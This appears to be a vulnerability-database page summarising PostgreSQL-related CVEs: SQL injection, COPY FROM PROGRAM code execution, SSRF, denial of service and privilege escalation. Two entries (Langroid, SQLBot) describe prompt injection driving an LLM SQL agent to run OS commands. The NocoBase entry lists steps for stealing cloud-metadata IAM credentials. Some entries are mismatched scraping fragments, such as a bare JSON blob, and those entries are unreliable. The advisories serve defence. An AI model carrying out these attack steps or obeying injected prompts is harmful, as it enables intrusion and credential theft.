PostgreSQL

146 CVEs

CVE-2026-25879 PyPI CRITICAL PATCH GHSA Act Now

Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.

RCE Python Information Disclosure SQLi PostgreSQL
NVD GitHub
CVSS 3.1
9.8
CVE-2026-9617 MEDIUM PATCH This Month

Privilege escalation in PostgreSQL Anonymizer (all versions prior to 3.1.0) allows an authenticated database user to gain superuser privileges by embedding malicious SQL code within a column identifier of a user-created table. When a superuser invokes the k-anonymity function against such a table, the injected code executes with superuser-level privileges, yielding full confidentiality, integrity, and availability impact across the database. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code has been identified at time of analysis, though SSVC rates technical impact as total due to the complete privilege escalation outcome.

SQLi PostgreSQL
NVD
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-46421 npm CRITICAL PATCH GHSA MAL Act Now

Supply chain compromise of SAP CAP Node.js database packages (@cap-js/sqlite 2.2.2, @cap-js/postgres 2.2.2, @cap-js/db-service 2.10.1) published on April 29, 2026 enables credential theft and self-propagation on developer and build machines. Malicious code in these npm packages harvests npm tokens, cloud provider credentials, SSH keys, and GitHub PATs from any host that installed them. No separate public exploit was identified at time of analysis, since the malicious payload itself constituted in-the-wild distribution via the npm registry.

Information Disclosure PostgreSQL Node.js
NVD GitHub
CVE-2026-40930 Awaiting Data

Pre-NVD disclosure via the oss-security mailing list, 2026/05/15: "libpng-apng: Chunk-smuggling vulnerability in push-mode APNG parser: CVE-2026-40930" (Cosmin Truta <ctruta@...il.com>). Neighbouring posts captured from the same list index: "Security Advisory: Multiple Vulnerabilities in llama.cpp GGUF Format Parsers" (135266653@...com); "CVE-2026-35194: Apache Flink: Remote code execution via SQL injection in code generation" (Martijn Visser <martijnvisser@...che.org>); "netatalk 4.4.3 fixes 20 CVEs, leaves 18 for later" (Alan Coopersmith <alan.coopersmith@...cle.com>); "PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 Released with security fixes" (Alan Coopersmith <alan.coopersmith@...cle.com>); "Poppy: XPC Observability & Fault Injecti".

RCE Apache SQLi PostgreSQL
NVD
CVE-2026-45678 Go HIGH PATCH GHSA This Week

Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.

Denial Of Service Python Docker PostgreSQL
NVD GitHub
CVSS 3.1
7.5
CVE-2026-44719 MEDIUM PATCH This Month

Authenticated users in Mathesar 0.2.0 through 0.9.x can access metadata for PostgreSQL databases where they lack collaborator privileges, due to missing authorization checks in four API methods (collaborators.list, tables.metadata.list, explorations.list, forms.list). Exposed data includes table schemas, saved explorations, form configurations, and critically, public form submission tokens that grant unauthorized database write access under the form's PostgreSQL role. Fixed in version 0.10.0. CVSS 5.3 (Medium) reflects network-accessible, low-complexity exploitation requiring only basic authentication. No public exploit code or active exploitation detected (EPSS data unavailable, not in CISA KEV).

Authentication Bypass PostgreSQL
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-44718 MEDIUM PATCH This Month

Broken access control in Mathesar 0.2.0 through 0.9.x allows authenticated users to read, modify, or delete saved explorations (database query definitions) in databases where they lack collaborator privileges. Exploitation requires only a valid user account and knowledge of an exploration ID - easily guessed or enumerated. Fixed in version 0.10.0. No public exploit identified at time of analysis, with EPSS data not available for this recently disclosed vulnerability.

Authentication Bypass PostgreSQL
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-45717 npm HIGH PATCH GHSA This Week

Budibase servers before version 3.38.1 allow any authenticated application user to modify datasource connection parameters through the REST API endpoint PUT /api/datasources/:datasourceId, which requires only basic TABLE/READ permissions instead of builder-level access. This authorization bypass enables attackers with minimal BASIC role privileges to redirect PostgreSQL, MySQL, MongoDB, or REST datasources to arbitrary hosts and ports, creating server-side request forgery (SSRF) conditions that bypass existing HTTP-layer protections for SQL driver connections. The vulnerability has been assigned CVSS 8.8 (High) and is fixed in Budibase 3.38.1.

Authentication Bypass Privilege Escalation PostgreSQL Command Injection SSRF
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7373 HIGH This Week

Local privilege escalation in Rapid7 Metasploit Pro allows unprivileged Windows users to achieve SYSTEM-level execution via OpenSSL configuration file hijacking. The metasploitPostgreSQL service loads openssl.cnf from a non-existent directory writable by standard users, enabling arbitrary command execution with SYSTEM privileges. Rated CVSS 8.5 (High) with proof-of-concept exploitation status (E:P). EPSS data not yet available. Not currently listed in CISA KEV catalog, suggesting vendor-disclosed rather than observed in-the-wild exploitation at time of analysis.

Privilege Escalation PostgreSQL OpenSSL Microsoft
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-45288 NuGet CRITICAL PATCH GHSA Act Now

SQL injection in Marten's PostgreSQL full-text search APIs allows remote unauthenticated attackers to execute arbitrary database commands when applications pass user-controlled input to the regConfig parameter. The vulnerability affects all five search method overloads (SearchAsync, PlainTextSearchAsync, PhraseSearchAsync, WebStyleSearchAsync, PrefixSearchAsync) where the regConfig parameter is interpolated directly into SQL without validation. Confirmed exploit payloads demonstrate time-based blind extraction, information disclosure via SELECT statements, and DDL execution including table drops. Vendor-released patch available in Marten 8.37.0 via GitHub PR #4343. No public exploit identified at time of analysis, though the advisory includes working proof-of-concept payloads for all affected methods.

Information Disclosure SQLi PostgreSQL
NVD GitHub
CVSS 3.1
9.8
CVE-2026-44792 npm HIGH PATCH GHSA This Week

SQL injection in n8n's Source Control feature allows attackers with git repository write access to execute arbitrary SQL against the PostgreSQL backend when administrators pull malicious Data Table JSON files. The vulnerability requires a specific attack chain: attacker git repository access, Source Control feature enabled, PostgreSQL backend, and admin-triggered pull operation. Vendor-released patches are available across all affected version branches (1.x, 2.20.x, 2.21.x). No public exploit identified at time of analysis, and the multi-prerequisite exploitation path significantly limits real-world attack surface to supply chain or insider threat scenarios.

SQLi PostgreSQL
NVD GitHub
CVE-2026-6638 LOW PATCH Monitor

SQL injection in PostgreSQL logical replication ALTER SUBSCRIPTION REFRESH PUBLICATION allows authenticated local or network users with table creation privileges to execute arbitrary SQL queries with the publication subscriber's credentials. The attack is deferred until the next REFRESH PUBLICATION command is executed, requiring user interaction or scheduled maintenance. PostgreSQL 16.x, 17.x, and 18.x versions prior to 16.14, 17.10, and 18.4 respectively are vulnerable; earlier versions are unaffected. No public exploit code or active exploitation has been identified.

SQLi PostgreSQL
NVD VulDB
CVSS 3.1
3.7
EPSS
0.0%
CVE-2026-6637 HIGH PATCH This Week

Stack buffer overflow in PostgreSQL's refint module allows low-privileged database users to execute arbitrary code as the database operating system user across all supported versions before 14.23, 15.18, 16.14, 17.10, and 18.4. The vulnerability enables two distinct attack paths: direct stack overflow leading to OS-level code execution, and SQL injection when applications expose user-controlled columns configured as refint cascade primary keys. With CVSS 8.8 (AV:N/AC:L/PR:L) and network-based exploitation requiring only low-privilege database credentials, this represents a critical privilege escalation risk for PostgreSQL deployments. No active exploitation (CISA KEV) or public POC identified at time of analysis.

RCE Buffer Overflow SQLi PostgreSQL Stack Overflow +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-6575 MEDIUM PATCH This Month

Buffer over-read in PostgreSQL 18.0 through 18.3 allows authenticated table maintainers to infer sensitive memory contents by exploiting mismatched array lengths in the pg_restore_attribute_stats() function during query planning. The vulnerability requires authenticated database access and table maintenance privileges but enables information disclosure without modifying data or causing service disruption.

Buffer Overflow PostgreSQL Suse
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-6479 HIGH PATCH This Week

Denial of service in PostgreSQL allows remote unauthenticated attackers to crash the database server via recursive SSL/GSS negotiation when connecting to AF_UNIX or TCP sockets (if SSL and GSS are both disabled). Affects all PostgreSQL versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. No active exploitation confirmed (not in CISA KEV). Vendor-released patches available across all supported major versions. EPSS data not available, but CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates high availability impact with low barrier to exploitation.

Denial Of Service PostgreSQL Suse
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-6478 MEDIUM PATCH This Month

Timing-channel attack in PostgreSQL MD5 password authentication enables remote unauthenticated attackers to extract user credentials through statistical analysis of authentication response times, affecting versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. The vulnerability exploits variable-time comparison operations during MD5 password hash verification, but does not impact the default scram-sha-256 authentication method. Databases migrated from PostgreSQL 13 or earlier may retain MD5-hashed passwords and remain vulnerable despite running newer versions.

Information Disclosure PostgreSQL Suse
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-6477 HIGH PATCH This Week

PostgreSQL libpq client library allows malicious server superusers to execute arbitrary code on connecting clients by overwriting stack buffers via unbounded responses to PQfn() calls. The vulnerability affects lo_export(), lo_read(), lo_lseek64(), and lo_tell64() functions used by psql and pg_dump utilities. A compromised or malicious PostgreSQL server can exploit clients running these common administrative tools during routine operations like database backups or large object exports. EPSS and KEV data not available for this recent CVE. CVSS 8.8 reflects the network attack vector with user interaction requirement (connecting to malicious server).

Information Disclosure PostgreSQL Suse
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-6476 HIGH PATCH This Week

SQL injection in PostgreSQL's pg_createsubscriber utility escalates privileges from pg_create_subscription to superuser, enabling arbitrary SQL execution. Affects PostgreSQL versions 17.0-17.9 and 18.0-18.3; exploitation requires high-privilege access (pg_create_subscription rights) but occurs remotely without additional complexity. Attack triggers when pg_createsubscriber next executes. Fixed in PostgreSQL 18.4 and 17.10. No CISA KEV listing or public exploit identified at time of analysis, but the technical simplicity (AC:L) and privilege escalation nature present moderate risk for multi-tenant or hosted PostgreSQL environments where subscription management permissions are delegated.

SQLi PostgreSQL Suse
NVD VulDB
CVSS 3.1
7.2
EPSS
0.0%
CVE-2026-6475 HIGH PATCH This Week

Symlink following vulnerabilities in PostgreSQL pg_basebackup and pg_rewind enable database superusers to overwrite arbitrary files on the destination server's filesystem, leading to local OS account takeover. Exploitation requires a malicious origin database superuser convincing an administrator to run these backup/replication tools (UI:R in CVSS), with practical impact limited to scenarios where database files are transferred between systems or snapshotted before server restart. No public exploit identified at time of analysis. CVSS 8.8 reflects theoretical severity, but real-world risk depends on specific operational workflows involving backup file transfers across trust boundaries.

Information Disclosure PostgreSQL Suse
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-6474 MEDIUM PATCH This Month

Format string vulnerability in PostgreSQL timeofday() function allows authenticated remote attackers to read arbitrary server memory by supplying crafted timezone values. Affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. The vulnerability enables information disclosure of sensitive data stored in process memory without code execution or data modification capabilities.

Information Disclosure PostgreSQL Red Hat Suse
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-6473 HIGH PATCH This Week

Remote code execution in PostgreSQL (versions 14.x-18.x) allows authenticated database users to execute arbitrary code as the database operating system user via integer wraparound vulnerabilities in multiple server features. By passing gigabyte-scale inputs to affected database functions, attackers trigger allocation undersizing that leads to out-of-bounds writes. No active exploitation confirmed (not in CISA KEV), but CVSS 8.8 with network vector and low complexity indicates high exploitability once technical details become public. EPSS data not available at time of analysis.

RCE PostgreSQL Integer Overflow Suse
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-6472 MEDIUM PATCH This Month

Missing authorization in PostgreSQL CREATE TYPE allows authenticated users to hijack search_path resolution and force other database users to execute arbitrary SQL functions chosen by the attacker. An authenticated attacker can create a malicious user-defined type in a schema that appears earlier in a victim's search_path than legitimate extension or system types, causing the victim's queries to execute attacker-controlled functions instead of intended ones. This affects PostgreSQL versions 14.x before 14.23, 15.x before 15.18, 16.x before 16.14, 17.x before 17.10, and 18.x before 18.4. While CVSS 5.4 is moderate, the attack requires authenticated database access and carries real risk in multi-tenant or shared PostgreSQL environments where privilege escalation or lateral movement is the goal.

Authentication Bypass PostgreSQL Suse
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-32687 HIGH PATCH GHSA This Week

SQL injection in the Elixir postgrex library allows local attackers with control over PostgreSQL LISTEN/UNLISTEN channel names to execute arbitrary SQL commands including DDL and DML operations. The Postgrex.Notifications module (versions 0.16.0 through 0.22.1) fails to escape double-quote characters in channel arguments, enabling attackers to break out of quoted identifiers and chain multi-statement payloads such as DROP TABLE commands. Vendor patch available in version 0.22.2 per GitHub advisory GHSA-r73h-97w8-m54h. No public exploit code or CISA KEV listing identified at time of analysis, though the technical details and patch diff are publicly disclosed.

SQLi PostgreSQL
NVD GitHub VulDB
CVSS 4.0
7.5
EPSS
0.0%
CVE-2026-7428 CRITICAL PATCH Act Now

Prior to 2025-11-03, well-intended users of Terraform or REST API for Google Cloud AlloyDB for PostgreSQL could have created clusters with an insecure default password which could have been exploited by a remote attacker to gain full administrative access to the database. Exploitation required network access to the AlloyDB cluster and was limited to Terraform or the REST API, as other clients blocked it.

Information Disclosure PostgreSQL Google Hashicorp
NVD
CVSS 4.0
9.2
EPSS
0.0%
CVE-2026-44635 npm HIGH PATCH GHSA This Week

{ "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } }

Path Traversal PostgreSQL Node.js Apple
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-44477 Go CRITICAL PATCH GHSA Act Now

Privilege escalation and OS command execution in CloudNativePG (CNPG) versions prior to 1.28.3 and 1.29.1 allow low-privileged PostgreSQL roles to gain superuser access and execute arbitrary commands inside the primary database pod. The metrics exporter connects as the postgres superuser and only demotes via SET ROLE, leaving session_user as superuser; an attacker who owns a database (including the default `app` role) can shadow unqualified identifiers like `current_database()` referenced in the stock `default-monitoring.yaml`, triggering the chain on the next scrape (≤30s). No public exploit identified at time of analysis, but the vulnerability is highly impactful (CVSS 9.4) and affects default deployments without custom metrics.

Privilege Escalation SQLi PostgreSQL Command Injection
NVD GitHub
CVSS 4.0
9.4
CVE-2026-7815 PyPI HIGH PATCH GHSA This Week

SQL injection in pgAdmin 4 Maintenance Tool allows authenticated users with tools_maintenance permission to execute arbitrary SQL and escalate to operating-system command execution on PostgreSQL database hosts. Four JSON fields (buffer_usage_limit, vacuum_parallel, vacuum_index_cleanup, reindex_tablespace) are concatenated unsafely into VACUUM/ANALYZE/REINDEX commands passed to psql. Attackers can break out of option syntax, inject SQL statements, and leverage PostgreSQL's COPY ... TO PROGRAM to achieve OS-level code execution. Fixed in version 9.15 via server-side allow-listing and proper input sanitization using qtIdent filter. EPSS data not available; no public exploit identified at time of analysis.

SQLi PostgreSQL
NVD GitHub
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-7814 PyPI MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.

XSS PostgreSQL
NVD GitHub
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-44680 npm HIGH PATCH GHSA This Week

SQL injection in MikroORM versions ≤7.0.13 (v7) and ≤6.6.13 (v6) allows authenticated attackers to execute arbitrary SQL queries by injecting malicious characters into schema names, JSON property filters, or query builder keys. The vulnerability stems from improper escaping of dialect-specific quote characters in identifier-quoting and JSON-path functions. Multi-tenant applications are at heightened risk of cross-tenant data leakage. Vendor-released patches are available: upgrade to 7.0.14 (v7) or 6.6.14 (v6). No public exploit identified at time of analysis, though the vulnerability was discovered during internal security review by the project maintainer.

Privilege Escalation SQLi PostgreSQL
NVD GitHub
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-41889 Go LOW PATCH Monitor

SQL injection vulnerability in pgx (Go PostgreSQL driver) prior to version 5.9.2 allows authenticated attackers to manipulate queries when the non-default simple protocol is used in conjunction with dollar-quoted string literals containing attacker-controlled placeholder-like text. The vulnerability requires specific configuration (simple protocol mode enabled) and precise SQL structure (dollar-quoted strings with embedded placeholder syntax), making exploitation unlikely in typical deployments but possible in applications explicitly using QueryExecModeSimpleProtocol.

SQLi PostgreSQL
NVD GitHub VulDB
CVSS 4.0
2.3
EPSS
0.0%
CVE-2026-41496 PyPI HIGH PATCH GHSA This Week

SQL injection in PraisonAI's multi-backend conversation storage system allows authenticated attackers to execute arbitrary SQL commands. The incomplete fix for CVE-2026-40315 validated input only in SQLiteConversationStore, leaving nine other database backends (MySQL, PostgreSQL, Turso, SingleStore, Supabase, SurrealDB, and their async variants) vulnerable to f-string SQL injection via unvalidated table_prefix and schema parameters. 52 injection points exist across the codebase. Exploitable in multi-tenant deployments or API-driven configurations where table_prefix is derived from external input. Patches released in praisonai 4.6.9 and praisonaiagents 1.6.9 address all affected backends. EPSS and KEV data unavailable; no public POC confirmed at time of analysis.

SQLi PostgreSQL
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-44349 Go HIGH PATCH GHSA This Week

Blind SQL injection in daptin's `/api/world` query filter, as demonstrated by the proof-of-concept in the GitHub advisory (measured on commit `5d32142`, SQLite, macOS arm64): a tautology injected through the filter's column name returns rows where the baseline query returns none, and a boolean-blind oracle then extracts the `sqlite_master` table count and the emails and bcrypt password hashes stored in `user_account`.

**Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required.

**What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

Python SQLi PostgreSQL Apple Oracle
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-29090 PyPI CRITICAL PATCH GHSA Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.

RCE Python SQLi PostgreSQL
NVD GitHub
CVSS 4.0
9.0
EPSS
0.0%
CVE-2026-29080 PyPI CRITICAL PATCH GHSA Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.

RCE Python Java SQLi PostgreSQL +1
NVD GitHub
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-33324 CRITICAL PATCH Act Now

Prompt injection in SQLBot 1.7.0 and earlier allows authenticated attackers to execute arbitrary SQL statements through the Text2SQL chat interface, escalating to remote code execution when connected to PostgreSQL databases via COPY FROM PROGRAM. The vulnerability stems from unsanitized user input being directly concatenated into LLM prompts, with resulting SQL executed without validation. CVSS 9.4 (Critical) reflects network-based attack with low complexity requiring only low-privilege authentication. SSVC framework confirms proof-of-concept availability and total technical impact, though exploitation is not fully automatable. Vendor-released patch 1.7.1 addresses the issue.

RCE SQLi PostgreSQL
NVD GitHub VulDB
CVSS 4.0
9.4
EPSS
0.3%
CVE-2026-42032 PyPI MEDIUM PATCH GHSA This Month

Authorization bypass in CKAN's datastore_search_sql function allows unauthenticated attackers to access private DataStore resources and extract PostgreSQL system information. CKAN versions prior to 2.10.10 and 2.11.0-2.11.4 are affected. The vulnerability exists in a feature that is disabled by default but can be enabled via configuration, limiting baseline exposure but creating significant risk for deployments that enable SQL search functionality.

Authentication Bypass PostgreSQL
NVD GitHub VulDB
CVSS 4.0
6.7
EPSS
0.0%
CVE-2026-42031 PyPI HIGH PATCH GHSA This Week

A vulnerability in `datastore_search_sql` allowed attackers to inject SQL in order to gain access to private resources and PostgreSQL system information. The issue has been patched in CKAN 2.10.10 and CKAN 2.11.5. Workaround: disable the DataStore SQL search (`ckan.datastore.sqlsearch.enabled = false`). Note that the SQL search is disabled by default. As stated in the [documentation](https://docs.ckan.org/en/2.11/maintaining/configuration.html#ckan-datastore-sqlsearch-enabled), this action function has protections that offer some safety but are not designed to prevent all types of abuse. Depending on the sensitivity of private data in a project's DataStore and the likelihood of abuse of a consuming site, a developer may choose to disable this action function or restrict its use with an [`IAuthFunctions`](https://docs.ckan.org/en/2.11/extensions/plugin-interfaces.html#ckan.plugins.interfaces.IAuthFunctions) plugin. Reported by Arvin Shivram of Brutecat Security.

SQLi PostgreSQL
NVD GitHub VulDB
CVSS 4.0
8.3
EPSS
3.1%
CVE-2026-42198 Maven HIGH PATCH GHSA This Week

pgjdbc is an open source PostgreSQL JDBC driver. From version 42.2.0 up to but not including version 42.7.11, pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication. A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count. With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail. A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools. In affected versions, loginTimeout did not fully mitigate this problem: when loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation. This issue has been patched in version 42.7.11.

Denial Of Service PostgreSQL Red Hat Suse
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-3960 Maven CRITICAL PATCH Act Now

Remote code execution in H2O-3 versions 3.46.0.9 and earlier allows unauthenticated attackers to execute arbitrary code via the /99/ImportSQLTable REST API by abusing PostgreSQL JDBC driver parameters that bypass an incomplete MySQL-only parameter blacklist. No active exploitation is recorded in CISA KEV and EPSS is low (0.19%), but a vendor patch is available and SSVC marks exploitation status as POC, indicating proof-of-concept-grade attacker capability against a network-reachable endpoint.

RCE PostgreSQL Code Injection
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-41167 CRITICAL PATCH Act Now

SQL injection in Jellystat versions prior to 1.1.10 escalates to remote code execution on the PostgreSQL database host. Authenticated attackers can inject arbitrary SQL via multiple API endpoints (`/api/getUserDetails`, `/api/getLibrary`), initially exfiltrating sensitive credentials from the `app_config` table (including Jellystat admin credentials and Jellyfin API keys). Because the application uses node-postgres simple query protocol allowing stacked queries, attackers can leverage PostgreSQL's `COPY ... TO PROGRAM` to achieve command execution on the database server. The project's default docker-compose.yml deploys PostgreSQL with superuser privileges, removing any privilege barriers to RCE. Vendor patch released in version 1.1.10 (GitHub commit 735fe7c confirmed). No active exploitation confirmed by CISA KEV, but publicly available exploit code exists given the detailed technical disclosure in GitHub Security Advisory GHSA-fj7c-2p5q-g56m.

Docker SQLi PostgreSQL
NVD GitHub
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-41640 npm HIGH POC PATCH GHSA This Week

SQL injection in NocoBase's @nocobase/database package allows authenticated users with record-creation privileges to execute arbitrary SQL queries and extract database credentials. The vulnerability exists in the queryParentSQL() function, which constructs recursive Common Table Expression (CTE) queries using string concatenation instead of parameterized queries when processing tree collections with string primary keys. An attacker can inject malicious SQL by creating records with crafted primary key values, triggering the vulnerability when recursive eager loading occurs. Successful exploitation leads to full database compromise, with confirmed extraction of administrator credentials (emails and password hashes) in testing against PostgreSQL. On databases where the service account has elevated privileges, attackers can achieve operating system command execution via PostgreSQL's COPY...TO PROGRAM feature. Vendor patch available via GitHub PR #9133.

SQLi PostgreSQL Command Injection Debian
NVD GitHub
CVSS 3.1
7.5
EPSS
4.2%
CVE-2026-41641 npm HIGH POC PATCH GHSA This Week

SQL injection in NocoBase plugin-collection-sql allows authenticated users with collection management permissions to bypass validation controls and execute arbitrary SQL queries. The checkSQL() function blocks dangerous keywords on collection creation and execution but is completely absent from the update endpoint, enabling attackers to create benign SQL collections then modify them with malicious queries to exfiltrate sensitive data including user credentials. Vendor patch available via GitHub PR #9134 and commit 851aee5. CVSS 7.2 reflects high privileges required (PR:H), but real-world impact is severe for environments where collection managers are not fully trusted administrators.

Privilege Escalation SQLi PostgreSQL
NVD GitHub
CVSS 3.1
7.2
EPSS
0.2%
CVE-2026-40906 CRITICAL PATCH Act Now

Electric is a Postgres sync engine. From 1.1.12 to before 1.5.0, the order_by parameter in the ElectricSQL /v1/shape API is vulnerable to error-based SQL injection, allowing any authenticated user to read, write, and destroy the full contents of the underlying PostgreSQL database through crafted ORDER BY expressions. This vulnerability is fixed in 1.5.0.

SQLi PostgreSQL
NVD GitHub VulDB
CVSS 3.1
9.9
EPSS
0.0%
CVE-2026-39946 Go MEDIUM PATCH GHSA This Month

OpenBao 2.5.2 and earlier fails to properly quote PostgreSQL schema names during role revocation in the PostgreSQL database secrets engine, allowing authenticated high-privilege administrators to execute arbitrary SQL injection as the database management user. The vulnerability affects the credentials management workflow when revoking database roles, potentially compromising database integrity. A vendor-released patch (version 2.5.3) is available.

SQLi PostgreSQL Red Hat Hashicorp Suse
NVD GitHub VulDB
CVSS 4.0
4.6
EPSS
0.0%
CVE-2026-40346 npm MEDIUM PATCH GHSA This Month

```typescript
{
  url: trim(url), // User-controlled, no validation
  method,
  headers,
  params,
  timeout,
  ...(method.toLowerCase() !== 'get' && data != null
    ? { data: transformer ? await transformer(data) : data }
    : {}),
});
```

The `url` at line 98 comes directly from user workflow configuration with only whitespace trimming.

**`packages/plugins/@nocobase/plugin-action-custom-request/src/server/actions/send.ts` lines 172-198:**

```typescript
const axiosRequestConfig = {
  baseURL: ctx.origin,
  ...options,
  url: getParsedValue(url, variables), // User-controlled via template
  headers: { ... },
  params: getParsedValue(arrayToObject(params), variables),
  data: getParsedValue(toJSON(data), variables),
};
const res = await axios(axiosRequestConfig); // No IP validation
```

- No `request-filtering-agent` or SSRF library (confirmed via grep across entire codebase)
- No private IP range filtering
- No cloud metadata endpoint blocking
- No URL scheme validation
- No DNS rebinding protection

1. Authenticated user creates a workflow with HTTP Request node
2. Sets URL to `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
3. Triggers the workflow
4. Server fetches AWS metadata and returns IAM credentials in workflow execution logs

Alternatively via Custom Request action:

1. Create custom request with URL `http://127.0.0.1:5432` or `http://10.0.0.1:8080/admin`
2. Execute the action
3. Server makes request to internal service

- **Cloud metadata theft**: AWS/GCP/Azure credentials via metadata endpoints
- **Internal network access**: Scan and interact with services on private IP ranges
- **Database access**: Connect to localhost databases (PostgreSQL, Redis, etc.)
- **Authentication required**: Yes (authenticated user), but any workspace member can create workflows

PostgreSQL SSRF Microsoft Redis
NVD GitHub VulDB
CVSS 4.0
6.4
EPSS
0.0%
CVE-2026-30778 Maven HIGH PATCH GHSA This Week

The SkyWalking OAP /debugging/config/dump endpoint may leak sensitive configuration information of MySQL/PostgreSQL. This issue affects Apache SkyWalking: from 9.7.0 through 10.3.0. Users are recommended to upgrade to version 10.4.0, which fixes the issue.

Apache Information Disclosure PostgreSQL
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-40887 npm CRITICAL POC PATCH GHSA Act Now

```ts
{ctx.languageCode}' THEN 2 WHEN '${ctx.channel.defaultLanguageCode}' THEN 1 ELSE 0 END`,
  'sort_order',
)
```

TypeORM has no opportunity to parameterize this value because it is embedded directly into the SQL string before being passed to the query builder. The `languageCode` value can originate from the HTTP query string and is set on the request context for every incoming API request. The value is cast to the `LanguageCode` TypeScript type at compile time, but no runtime validation is performed: the raw query string value is used as-is.

An unauthenticated attacker can append a crafted `languageCode` query parameter to any Shop API request to inject arbitrary SQL into the query. No user interaction is required. The vulnerable endpoint is exposed on every default Vendure installation.

**Upgrade to a patched version immediately.**

If you cannot upgrade right away, apply the following hotfix to `RequestContextService.getLanguageCode` to validate the `languageCode` input at the boundary. This blocks injection payloads before they can reach any query:

```ts
private getLanguageCode(req: Request, channel: Channel): LanguageCode | undefined {
    const queryLanguageCode = req.query?.languageCode as string | undefined;
    const isValidFormat = queryLanguageCode && /^[a-zA-Z0-9_-]+$/.test(queryLanguageCode);
    return (
        (isValidFormat ? (queryLanguageCode as LanguageCode) : undefined) ??
        channel.defaultLanguageCode ??
        this.configService.defaultLanguageCode
    );
}
```

